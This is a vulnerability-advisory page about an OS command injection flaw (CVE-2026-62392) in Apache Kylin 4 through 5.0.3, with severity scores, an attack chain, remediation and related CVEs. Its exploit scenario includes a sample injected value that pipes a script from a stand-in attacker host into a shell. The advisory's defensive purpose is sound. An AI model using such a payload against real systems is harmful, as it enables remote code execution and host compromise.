Skip to main content

Apache Kylin CVE-2026-62392

| EUVDEUVD-2026-43664 CRITICAL
OS Command Injection (CWE-78)
9.8
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
8.8 HIGH

Network-reachable API with low-complexity command injection, but submitting job/config parameters typically requires an authenticated operator, so PR:L rather than PR:N; full C/I/A impact from OS command execution.

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from NVD.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

5
Analysis Updated
Jul 14, 2026 - 17:13 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jul 14, 2026 - 17:07 vuln.today
cvss_changed
CVSS changed
Jul 14, 2026 - 17:07 NVD
9.8 (CRITICAL)
Analysis Generated
Jul 14, 2026 - 04:16 vuln.today
CVE Published
Jul 14, 2026 - 03:47 oss-security
CRITICAL

Description PRE-NVD

Disclosed via oss-security. NVD scoring and full description are pending.

AnalysisAI

OS command injection in Apache Kylin (versions 4 through 5.0.3) allows attackers to execute arbitrary operating-system commands by supplying malicious job configuration parameters that a backend API passes unsanitized to the OS command line. Because Kylin runs as a distributed analytics engine, successful exploitation yields full host compromise with the privileges of the Kylin service account. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach Kylin backend API over network
Delivery
Submit job config with injected shell metacharacters
Exploit
Parameter passed unsanitized to OS command line
Execution
OS executes injected command as Kylin service account
Impact
Full host/cluster compromise

Vulnerability AssessmentAI

Exploitation Exploitation requires reachability to the Apache Kylin backend API that accepts job configuration parameters and the ability to supply or influence a job/build config value that is subsequently passed to the OS command line on a Kylin instance running an affected version (4 through 5.0.3). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The vendor CVSS 3.1 base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), indicating remote, low-complexity, unauthenticated exploitation with full host impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who can reach the Kylin backend API crafts a job/cube configuration parameter containing embedded shell metacharacters (for example appending ';curl attacker/x|sh'). When Kylin constructs the OS command line for that job, the injected commands execute on the host with the Kylin service account's privileges, giving the attacker code execution and a foothold in the analytics cluster. …
Remediation Vendor-released patch: upgrade to Apache Kylin 5.0.4, which fixes the OS command injection; this is the primary and recommended remediation for all installations running versions 4 through 5.0.3. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours, identify all systems running Apache Kylin versions 4.0-5.0.3 and assess network exposure; immediately isolate or air-gap affected systems if exposed to untrusted networks. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Kylin

View all
CVE-2020-1956 HIGH POC
8.8 May 22

Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the

CVE-2026-62390 CRITICAL
9.8 Jul 14

SQL injection in Apache Kylin (versions 4 through 5.0.3) allows attackers to inject arbitrary SQL through a backend API

CVE-2022-44621 CRITICAL
9.8 Dec 30

Diagnosis Controller miss parameter validation, so user may attacked by command injection via HTTP Request. Rated critic

CVE-2022-24697 CRITICAL
9.8 Oct 13

Kylin's cube designer function has a command injection vulnerability when overwriting system parameters in the configura

CVE-2020-13926 CRITICAL
9.8 Jul 14

Kylin concatenates and executes a Hive SQL in Hive CLI or beeline when building a new segment; some part of the HQL is f

CVE-2020-13925 CRITICAL
9.8 Jul 14

Similar to CVE-2020-1956, Kylin has one more restful API which concatenates the API inputs into OS commands and then exe

CVE-2020-13937 MEDIUM POC
5.3 Oct 19

Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.

CVE-2024-23590 CRITICAL
9.1 Nov 04

Session Fixation vulnerability in Apache Kylin.0.0 through 4.x. Rated critical severity (CVSS 9.1), this vulnerability i

CVE-2022-43396 HIGH
8.8 Dec 30

In the fix for CVE-2022-24697, a blacklist is used to filter user input commands. Rated high severity (CVSS 8.8), this v

CVE-2020-1937 HIGH
8.8 Feb 24

Kylin has some restful apis which will concatenate SQLs with the user input string, a user is likely to be able to run m

CVE-2025-61733 HIGH
7.5 Oct 02

Authentication Bypass Using an Alternate Path or Channel vulnerability in Apache Kylin. This issue affects Apache Kylin

CVE-2025-61734 HIGH
7.5 Oct 02

Files or Directories Accessible to External Parties vulnerability in Apache Kylin. You are fine as long as the Kylin's

Share

CVE-2026-62392 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy